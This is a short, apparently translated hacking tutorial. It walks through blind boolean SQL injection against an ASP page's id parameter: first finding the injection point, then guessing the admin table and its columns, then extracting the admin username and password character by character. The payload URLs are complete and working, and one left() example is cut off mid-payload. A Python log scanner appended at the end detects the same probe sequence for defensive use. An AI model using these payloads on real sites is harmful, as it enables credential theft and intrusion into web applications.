http://www.spking.com/
I wrote this very briefly, but it should still be understandable! No questions about it will be answered later! Please do not repost it. This is not an impressive technique; it is practically old news, and I would rather not embarrass myself!
Step 1:
http://www.aaa.com/./show.asp?id=259
http://www.aaa.com/./show.asp?id=259%20and%201=1
http://www.aaa.com/./show.asp?id=259%20and%201=2
This is the simplest check for an injection point: compare the page returned for the two conditions.
Step 2:
Guess the administrator login page: admin.asp, admin_admin.asp, and so on. If you cannot guess it, you had better look for another way in! You can also guess the table directly:
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20*%20from%20admin)
This guesses which table holds the login accounts; here I assume it is called admin.
Step 3:
Now the key part: guess the fields of the admin table. The three requests below test for the existence of the fields id, username and password (assuming all three exist). You can base the field names on the form variable names in the login page you found above!
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin)
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20username%20from%20admin)
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20password%20from%20admin)
Step 4:
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin%20where%20id=1)
This guesses the admin's id. Pay attention to the syntax I used; here we assume the id is 1.
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin%20where%20len(username)=6%20and%20id=1)
This checks whether the username is 6 characters long.
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin%20where%20asc(mid(username,1,1))>110%20and%20id=1)
Then I guess the username itself, one character at a time. Sometimes mid() is not usable, so I usually guess with the left() function instead, for example:
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin%20where%20left(username,1)=)
Step 5:
Repeat Step 4 with username replaced by password.
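Added example, not part of the original post: a small Python scanner that runs over constructed IIS-style log lines carrying the same probe sequence as the steps above, labels each stage (tautology test, exists-subquery, len() test, asc/mid/left character test) and groups the labels per client, since one source cycling through several probe types is the signature a defender looks for. The log field layout, the sample lines and the label names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS-style log lines (date time client-ip method uri-stem uri-query status);
# the payloads mirror the probes in the walkthrough above and are not real traffic.
SAMPLE_LOG = """\
2024-01-01 10:00:02 203.0.113.5 GET /show.asp id=259%20and%201=1 200
2024-01-01 10:00:03 203.0.113.5 GET /show.asp id=259%20and%201=2 200
2024-01-01 10:00:04 203.0.113.5 GET /show.asp id=259%20and%20exists%20(select%20*%20from%20admin) 200
2024-01-01 10:00:05 203.0.113.5 GET /show.asp id=259%20and%20exists%20(select%20id%20from%20admin%20where%20len(username)=6%20and%20id=1) 200
2024-01-01 10:00:06 203.0.113.5 GET /show.asp id=259%20and%20exists%20(select%20id%20from%20admin%20where%20asc(mid(username,1,1))>110%20and%20id=1) 200
2024-01-01 10:00:07 198.51.100.7 GET /show.asp id=260 200
"""

# One label per stage of the walkthrough: tautology, table/column existence, length, character test.
PROBES = [
    ("boolean-tautology", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("exists-subquery",   re.compile(r"\bexists\s*\(\s*select\b", re.I)),
    ("length-probe",      re.compile(r"\blen\s*\(", re.I)),
    ("char-probe",        re.compile(r"\b(?:asc|mid|left)\s*\(", re.I)),
]

def classify_query(raw_query):
    """Percent-decode a query string and return '<param>:<label>' for every probe pattern found."""
    hits = []
    for name, values in parse_qs(raw_query, keep_blank_values=True).items():
        for value in values:
            hits.extend(f"{name}:{label}" for label, pat in PROBES if pat.search(value))
    return hits

def scan_log(log_text):
    """Return (client_ip, uri_stem, labels) for each request whose query carries a probe."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line: skip it rather than crash
        ip, stem, query = fields[2], fields[4], fields[5]
        labels = classify_query(query)
        if labels:
            findings.append((ip, stem, labels))
    return findings

def suspicious_clients(findings, min_probe_types=2):
    """Clients using several distinct probe types are walking the enumeration sequence."""
    per_ip = {}
    for ip, _stem, labels in findings:
        per_ip.setdefault(ip, set()).update(labels)
    return {ip: sorted(kinds) for ip, kinds in per_ip.items() if len(kinds) >= min_probe_types}
```

The decoded-value match matters because a numeric id parameter should never contain SQL keywords at all, so even a single hit on such a parameter is worth alerting on.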